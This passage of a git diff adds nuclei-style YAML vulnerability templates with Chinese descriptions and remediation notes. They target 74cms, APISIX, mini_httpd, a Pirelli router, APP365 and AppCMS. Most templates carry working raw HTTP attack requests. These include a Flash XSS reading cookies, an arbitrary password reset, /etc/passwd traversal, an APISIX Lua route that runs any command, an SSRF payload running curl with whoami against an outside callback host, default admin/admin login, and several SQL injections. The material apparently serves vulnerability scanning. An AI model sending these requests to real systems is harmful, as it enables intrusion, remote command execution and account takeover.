\nXSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 + VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。\\n反射型XSS,是最普遍的类型。用户访问服务器-跨站链接-返回跨站代码,它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。\n" + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.74cms.com/download/index.html + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"3a1c6cc728dddc258091a601f28a9c12") + - contains(body,"53fef78841c3fae1ee992ae324a51620") + - contains(body,"4c2fc69dc91c885837ce55d03493a5f5") + raw: + - | + GET /admin/kindeditor/plugins/multiimage/images/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/74cms/wooyun-2015-0137785.yaml b/config/51pwn/yaml/74cms/wooyun-2015-0137785.yaml new file mode 100755 index 000000000..4791467cd --- /dev/null +++ b/config/51pwn/yaml/74cms/wooyun-2015-0137785.yaml @@ -0,0 +1,47 @@ +id: wooyun-2015-0137785 +info: + name: 74cms最新版重置任意账号密码 + author: + - jim2g + description: | + 74cms最新版重置任意账号密码 + 骑士CMS人才招聘系统是基于PHP+MYSQL的免费人才招聘系统源码,13年专注部署版源码系统研发.模块化设计,前后端分离,支持后台一键升级更新. + severity: medium + remediation: |2 + + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.74cms.com/download/index.html + 临时修复方案: + 根据漏洞具体详细进行漏洞修复方案描写 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 + - regex("name=\"token\" value=\"(.*?)\"",body) + - status_code_2==302 + - status_code_3==200 + - contains(body_3,"icon-success") + extractors: + - name: token + type: regex + regex: + - name="token" value="(.*?)" + group: 1 + part: body + internal: true + raw: + - | + GET /user/user_getpass.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /user/user_getpass.php?act=get_pass_save HTTP/1.1 + Host: {{Hostname}} + + token={{token}}&uid=2&password=123456 + - | + GET /user/user_getpass.php?act=get_pass_sucess HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/ACME mini_httpd/CVE-2018-18778.yaml b/config/51pwn/yaml/ACME mini_httpd/CVE-2018-18778.yaml new file mode 100755 index 000000000..0e744fdac --- /dev/null +++ b/config/51pwn/yaml/ACME mini_httpd/CVE-2018-18778.yaml @@ -0,0 +1,42 @@ +id: CVE-2018-18778 +info: + name: mini_httpd Path Traversal + author: + - dhiyaneshdk + tags: + - cve + - cve2018 + - lfi + description: "ACME mini_httpd 任意文件读取\n ACME mini_httpd是ACME实验室的一款小型HTTP服务器。\n\nACME + mini_httpd 1.30之前版本中存在安全漏洞。远程攻击者可利用该漏洞读取任意文件。 " + reference: + - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ + - http://www.acme.com/software/mini_httpd/ + severity: medium + classification: + cve-id: + - cve-2018-18778 + cwe-id: + - cwe-200 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + http://www.acme.com/software/mini_httpd/ + + 临时修复方案:
1、过滤\".\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + regex: + - 'root:.*:0:0:' + matchers-condition: and + raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: + + unsafe: true diff --git a/config/51pwn/yaml/ADB/CVE-2015-0554.yaml b/config/51pwn/yaml/ADB/CVE-2015-0554.yaml new file mode 100755 index 000000000..1d860df1d --- /dev/null +++ b/config/51pwn/yaml/ADB/CVE-2015-0554.yaml @@ -0,0 +1,35 @@ +id: CVE-2015-0554 +info: + name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure + author: + - l0ne1y + description: |- + ADB P.DGA4001N路由器信息泄露漏洞 + ADB(前称Pirelli Broadband Solutions)P.DGA4001N是瑞士ADB公司的一款ADSL无线路由器产品。 + + 使用PDG_TEF_SP_4.06L.6版本固件的ADB P.DGA4001N路由器存在安全漏洞,该漏洞源于程序没有正确限制对Web界面的访问。远程攻击者可通过向wlsecurity.html页面或resetrouter.html页面发送请求利用该漏洞获取敏感信息或造成拒绝服务(设备重启)。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.pirellibroadband.com/ + + 临时修复方案: + 1、去除页面中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - var wpapskkey + - var WscDevPin + - var sessionkey + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/wlsecurity.html' + method: GET diff --git a/config/51pwn/yaml/APISIX/CVE-2020-13945.yaml b/config/51pwn/yaml/APISIX/CVE-2020-13945.yaml new file mode 100755 index 000000000..f6efab14f --- /dev/null +++ b/config/51pwn/yaml/APISIX/CVE-2020-13945.yaml @@ -0,0 +1,52 @@ +id: CVE-2020-13945 +info: + name: Apache APISIX's Admin API Default Access Token (RCE) + author: + - l0ne1y + description: |- + Apache APISIX Admin API 默认Token导致RCE漏洞 + Apache APISIX 是一个动态、实时、高性能的 API 网关,基于 Nginx 网络库和 etcd 实现, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。当使用者开启了Admin API,没有配置相应的IP访问策略,且没有修改配置文件Token的情况下,则攻击者利用Apache APISIX的默认Token即可访问Apache APISIX,从而控制APISIX网关。 + severity: critical + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E + + **临时修复方案** + 1.修改Apache APISIX配置文件中 conf/config.yaml 的admin_key,禁止使用默认Token + 2.若非必要,关闭Apache APISIX Admin API功能,或者增加IP访问限制。 +requests: +- matchers: + - type: word + condition: and + words: + - '"action":"create"' + - '"script":' + - '"node":' + - '{{fileName}}' + - type: status + status: + - 201 + matchers-condition: and + raw: + - | + POST /apisix/admin/routes HTTP/1.1 + Host: {{Hostname}} + X-API-KEY: edd1c9f034335f136f87ad84b625c8f1 + Content-Type: application/json + + { + "uri":"/{{fileName}}", + "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M", + "upstream":{ + "type":"roundrobin", + "nodes":{ + "example.com:80":1 + } + } + } + - | + GET /{{fileName}}?cmd=echo {{fileName}} HTTP/1.1 + Host: {{Hostname}} +variables: + fileName: '{{rand_text_alphanumeric(15,"")}}' diff --git a/config/51pwn/yaml/APISIX/CVE-2021-45232.yaml b/config/51pwn/yaml/APISIX/CVE-2021-45232.yaml new file mode 100755 index 000000000..66ae91325 --- /dev/null +++ b/config/51pwn/yaml/APISIX/CVE-2021-45232.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-45232 +info: + name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access + author: + - l0ne1y + description: |- + Apache APISIX Dashboard 认证绕过漏洞 + Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 + + Apache APISIX Dashboard 存在访问控制错误漏洞,该漏洞源于 Manager API使用了两个框架,在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的,但是有些API直接使用了 框架 gin 的接口从而绕过身份验证。 + severity: critical + remediation: | + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 + + **临时修复方案** + 1、关键路径禁止直接暴漏在互联网,需通过VPN等较为安全的接入方式访问内部系统。 + 2、后台管理系统所有页面开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。 + 3、限制IP访问,绑定固定的IP访问后台管理系统。 + 4、采用成熟的权限管理框架,如spring security。 +requests: +- matchers: + - type: word + words: + - '"Consumers":' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{RootURL}}/apisix/admin/migrate/export' + method: GET diff --git a/config/51pwn/yaml/APISIX/CVE-2022-24112.yaml b/config/51pwn/yaml/APISIX/CVE-2022-24112.yaml new file mode 100755 index 000000000..dbb361598 --- /dev/null +++ b/config/51pwn/yaml/APISIX/CVE-2022-24112.yaml @@ -0,0 +1,70 @@ +id: CVE-2022-24112 +info: + name: Apache APISIX - Remote Code Execution + author: + - l0ne1y + description: |- + Apache APISIX batch-requests SSRF导致远程代码执行漏洞 + Apache APISIX 是一个云原生、高性能、可扩展的微服务API 开源网关,基于OpenResty(Nginx+Lua)和etcd来实现。2022年1月22日,安全研究人员披露利用Apache APISIX batch-requests 可造成SSRF漏洞,同时配合伪造 X-Real-IP ,在 APISIX Admin Token 未修改的情况下可利用 SSRF 创建路由以及Lua脚本,从而执行任意命令,控制服务器。 + severity: critical + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread/lcdqywz8zy94mdysk7p3gfdgn51jmt94 + + **临时修复方案** + 1、过滤内网服务器对公网服务器请求的响应。如果Web应用是获取某一类型的文件,在把返回结果展示给用户之前应先验证返回的信息是否符合文件类型标准,比如返回信息应为图片,如果返回信息是HTML,则停止将返回信息返回客户端。 + 2、统一错误提示信息,避免用户可以根据错误信息来判断远端服务器的端口状态。 + 3、在内网服务器的防火墙上限制公网服务器的请求端口为HTTP等协议常用端口,如:80、443、8080、8090。 + 4、若公网服务器的内网IP与内网无业务通信,建议将公网服务器对应的内网IP列入黑名单,避免应用被用来获取内网数据。 + 5、内网服务器禁用不必要的协议,仅允许HTTP和HTTPS请求,防止类似于file:///、gopher://、ftp:// 等协议引起的安全问题。 +requests: +- matchers: + - type: word + condition: and + part: body_1 + words: + - '"reason":"OK"' + - '"status":200' + - type: status + status: + - 200 + - type: word + part: interactsh_protocol + words: + - http + extractors: + - type: regex + regex: + - GET \/([a-z-]+) HTTP + group: 1 + part: interactsh_request + matchers-condition: and + raw: + - | + POST /apisix/batch-requests HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + + { + "headers":{ + "X-Real-IP":"127.0.0.1", + "Content-Type":"application/json" + }, + "timeout":1500, + "pipeline":[ + { + "method":"PUT", + "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", + "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}" + } + ] + } + - | + GET /api/{{randstr}} HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + req-condition: true diff --git a/config/51pwn/yaml/APISIX/apisix-default-login.yaml b/config/51pwn/yaml/APISIX/apisix-default-login.yaml new file mode 100755 index 000000000..f45d101f3 --- /dev/null +++ b/config/51pwn/yaml/APISIX/apisix-default-login.yaml @@ -0,0 +1,42 @@ +id: apisix-default-login +info: + name: Apache Apisix Default Admin Login + author: + - l0ne1y + description: |- + Apache Apisix 默认口令登录漏洞 + Apache Apisix是Apache基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。其web管理后台默认口令为admin/admin。 + severity: high + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - '"data"' + - '"token"' + - '"code":0' + matchers-condition: and + raw: + - | + POST /apisix/admin/user/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + Authorization: + Content-Type: application/json;charset=UTF-8 + + {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork + payloads: + pass: + - admin + user: + - admin diff --git "a/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-0113020.yaml" "b/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-0113020.yaml" new file mode 100755 index 000000000..ea999d27e --- /dev/null +++ "b/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-0113020.yaml" @@ -0,0 +1,24 @@ +id: wooyun-2010-0113020 +info: + name: APP365在线物流管理平台province.jspx参数province_id SQL注入漏洞 + author: + - jim2g + description: | + APP365在线物流管理平台province.jspx参数province_id 存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.so56.cc \n临时修复方案:\n1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。\n2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。\n3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。\n4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。\n5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。\n6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。\n7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。\n8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==500 + - contains(body,'~~~202cb962ac59075b964b07152d234b70~~~') + raw: + - | + GET /site56/Station/province.jspx?province_id=-5423%20OR%201%20GROUP%20BY%20CONCAT%280x7e7e7e%2Cmd5%28123%29%2C0x7e7e7e%2CFLOOR%28RAND%280%29%2a2%29%29%20HAVING%20MIN%280%29%23 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + req-condition: true diff --git "a/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-074765.yaml" "b/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-074765.yaml" new file mode 100755 index 000000000..6c04c8112 --- /dev/null +++ "b/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-074765.yaml" @@ -0,0 +1,38 @@ +id: wooyun-2010-074765 +info: + name: APP365在线物流管理平台trackOrder.jspx参数order_no SQL注入漏洞 + author: + - jim2g + description: | + APP365在线物流管理平台trackOrder.jspx参数order_no 存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.so56.cc + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==500 + - contains(body,'~~~~~~') + raw: + - | + POST /site56/LmsOrder/trackOrder.jspx HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + btn=1&order_no=1%27%20AND%20EXTRACTVALUE%281%2CCONCAT%280x7e7e7e%2C0x7e7e7e%29%29%20AND%20%27a%27%3D%27a + req-condition: true diff --git "a/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-088177.yaml" "b/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-088177.yaml" new file mode 100755 index 000000000..f144a1e4d --- /dev/null +++ "b/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2010-088177.yaml" @@ -0,0 +1,38 @@ +id: wooyun-2010-088177 +info: + name: APP365在线物流管理平台stationList.jspx参数city_name SQL注入漏洞 + author: + - jim2g + description: | + APP365在线物流管理平台stationList.jspx参数city_name 存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.so56.cc + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==500 + - contains(body,'~~~G~~~') + raw: + - | + POST /site56/Station/stationList.jspx HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + btn=88952634&city_name=%E8%AF%B7%E9%80%89%E6%8B%A9/%E8%BE%93%E5%85%A5%E5%9F%8E%E5%B8%82%E5%90%8D%E7%A7%B0%27%29%20AND%20EXTRACTVALUE%281373%2CCONCAT%280x7e7e7e%2Cchar%2871%29%2C0x7e7e7e%29%29%20AND%20%28%27a%27%3D%27a + req-condition: true diff --git "a/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2015-0103389.yaml" "b/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2015-0103389.yaml" new file mode 100755 index 000000000..c447742a2 --- /dev/null +++ "b/config/51pwn/yaml/APP365\345\234\250\347\272\277\347\211\251\346\265\201\347\256\241\347\220\206\345\271\263\345\217\260/wooyun-2015-0103389.yaml" @@ -0,0 +1,24 @@ +id: wooyun-2015-0103389 +info: + name: APP365在线物流管理平台province.jspx参数province_id SQL注入漏洞 + author: + - jim2g + description: | + APP365在线物流管理平台province.jspx参数province_id 存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 在Web程序中,通常会使用SQL指令来查询、更新数据库数据,通常查询或者更新数据会带有一些条件,而这些条件通常是提供给用户输入的,那么恶意用户即可通过修改相关条件来执行恶意的SQL指令来获取或更新数据库的数据,甚至在数据库账号权限较高的情况下,可以插入恶意SQL指令来调用数据库中的特殊函数来向服务器读、写文件或者执行操作系统命令。 + severity: high + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.so56.cc \n临时修复方案:\n1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。\n2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。\n3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。\n4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。\n5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。\n6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。\n7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。\n8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==500 + - contains(body,'~~~o~~~') + raw: + - | + GET /site56/FreightRate/qryFreightRate.jspx?origin_city=%27+AND+EXTRACTVALUE(9061%2cCONCAT(0x7e7e7e%2cchar(111)%2c0x7e7e7e))+AND+%27a%27%3d%27a HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + req-condition: true diff --git a/config/51pwn/yaml/APPCMS/AppCMS-File-download-vulnerability.yaml b/config/51pwn/yaml/APPCMS/AppCMS-File-download-vulnerability.yaml new file mode 100755 index 000000000..756e63ceb --- /dev/null +++ b/config/51pwn/yaml/APPCMS/AppCMS-File-download-vulnerability.yaml @@ -0,0 +1,35 @@ +id: AppCMS-File-download-vulnerability +info: + name: AppCMS 任意文件下载漏洞检测 + author: + - jim2g + description: | + AppCMS 存在任意文件下载漏洞 + 任意文件下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。一般来说,攻击者利用服务器API、文件标准权限进行攻击。任意文件读取/下载漏洞可能存在于Web服务器软件本身,也可能存在于Web应用程序之中。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.zhiyouyun.com + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'DB_CHARSET') + - type: word + negative: true + words: + - "-1" + raw: + - | + GET /pic.php?url=MWpwZy8uLi9jb3JlL2NvbmZpZy5jb25uLnBocA==&type=jpg HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/APPCMS/appcms-databases.yaml b/config/51pwn/yaml/APPCMS/appcms-databases.yaml new file mode 100755 index 000000000..9b059a580 --- /dev/null +++ b/config/51pwn/yaml/APPCMS/appcms-databases.yaml @@ -0,0 +1,35 @@ +id: appcms-databases +info: + name: appcms_数据库备份文件可读漏洞 + author: + - jim2g + description: | + appcms_数据库备份文件可读漏洞漏洞 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.zhiyouyun.com + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: or + dsl: + - contains(body,'SELECT') + - contains(body,'FORM') + raw: + - | + GET /backup/appcms.sql HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/APPCMS/wooyun-2010-045643.yaml b/config/51pwn/yaml/APPCMS/wooyun-2010-045643.yaml new file mode 100755 index 000000000..1354689f1 --- /dev/null +++ b/config/51pwn/yaml/APPCMS/wooyun-2010-045643.yaml @@ -0,0 +1,35 @@ +id: wooyun-2010-045643 +info: + name: appcms_index.php_注入 + author: + - jim2g + description: | + appcms_index.php存在SQL注入漏洞 + 结构化查询语言(Structured Query Language)简称SQL,是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统,同时也是数据库脚本文件的扩展名。 + 